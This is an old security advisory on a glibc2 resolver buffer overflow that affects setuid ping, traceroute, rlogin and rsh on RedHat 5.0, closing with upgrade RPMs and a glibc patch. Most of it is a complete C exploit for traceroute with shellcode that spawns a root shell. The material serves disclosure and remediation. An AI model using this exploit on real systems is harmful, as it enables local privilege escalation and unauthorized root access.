COMMAND
/bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh
(actually glibc2 is guilty one)
SYSTEMS AFFECTED
RedHat 5.0 (Linux)
PROBLEM
Wilton Wong found following setuid things and noticed that in
RedHat 5.0 you can overrun the buffers in few commands. Below is
an exploit for traceroute; nothing fancy just what was to test it
with simple eggshell.
/*
Just Your Standard EGGSHELL Proggie:
traceroute buffer overflow exploit for RedHat Linux 5.0
mostly ripped from Aleph One <aleph1@underground.org>
Wilton Wong
wwong@blackstar.net
gcc -o trace_shell trace_shell.c
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1019
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
printf("Now run: /usr/sbin/traceroute $RET\n");
system("/bin/bash");
}
SOLUTION
The problem lise deep within one of the libraries.. glibc2 joy...
the programs themselves are not vulnerable. Newer traceroute is:
Intel: Upgrade to traceroute-1.4a5-5.i386.rpm
Alpha: Upgrade to traceroute-1.4a5-5.alpha.rpm
The patch will be in glibc 2.0.6 which should be released soonish
The patch has been for some time already in the development
version of glibc 2.1 but didn't make it in the 2.0 track. Patch:
$ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
--- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997
+++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997
@@ -321,7 +321,7 @@
u_char *answer; /* buffer to put answer */
int anslen; /* size of answer */
{
- char nbuf[MAXDNAME];
+ char nbuf[MAXDNAME * 2 + 2];
const char *longname = nbuf;
int n;
RedHat will be releasing an updated 2.0.5c RPM.